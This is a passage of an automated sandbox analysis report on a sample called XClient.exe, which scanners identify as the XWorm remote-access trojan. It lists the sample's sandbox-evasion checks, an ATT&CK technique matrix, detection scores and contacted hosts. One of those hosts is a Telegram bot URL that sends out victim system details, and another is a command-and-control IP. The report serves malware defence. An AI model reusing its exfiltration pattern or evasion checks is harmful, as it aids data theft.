                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\XClient.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeMemory allocated: 1ADC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeMemory allocated: 7B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeMemory allocated: 1A400000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeWindow / User API: threadDelayed 9625Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe TID: 7052Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe TID: 6212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: XClient.exe, 00000000.00000002.2405666189.000000001BA1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\XClient.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeQueries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeQueries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: XClient.exe, 00000000.00000002.2406664029.000000001D0D0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2406664029.000000001D0E2000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2405666189.000000001B9FF000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2405666189.000000001BA1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: XClient.exe, 00000000.00000002.2406664029.000000001D0E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ogramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: XClient.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: XClient.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  Process Injection                  		1
                  Disable or Modify Tools                  		1
                  Input Capture                  		121
                  Security Software Discovery                  		Remote Services1
                  Input Capture                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		131
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Process Injection                  		Security Account Manager131
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Ingress Tool Transfer                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Obfuscated Files or Information                  		LSA Secrets13
                  System Information Discovery                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture14
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  XClient.exe76%ReversingLabsWin32.Exploit.Xworm
                  XClient.exe100%AviraTR/Spy.Gen
                  XClient.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  144.48.105.1190%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                      		high
                      144.48.105.119true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/botXClient.exefalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXClient.exe, 00000000.00000002.2402286197.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUfalse
                          144.48.105.119
                          		unknownSingapore
                          		63018DEDICATEDUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1582524
                          Start date and time:2024-12-30 20:13:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:XClient.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@2/0@1/2
                          EGA Information:
                          • Successful, ratio: 50%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 12
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.28.90.27
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target XClient.exe, PID 4992 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: XClient.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:13:41API Interceptor6442370x Sleep call for process: XClient.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                            iviewers.dllGet hashmaliciousLummaCBrowse
                              Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                  INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                    cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            tg.exeGet hashmaliciousBabadedaBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.telegram.orgRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 149.154.167.220
                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                              • 149.154.167.220
                                              Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                              • 149.154.167.220
                                              INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
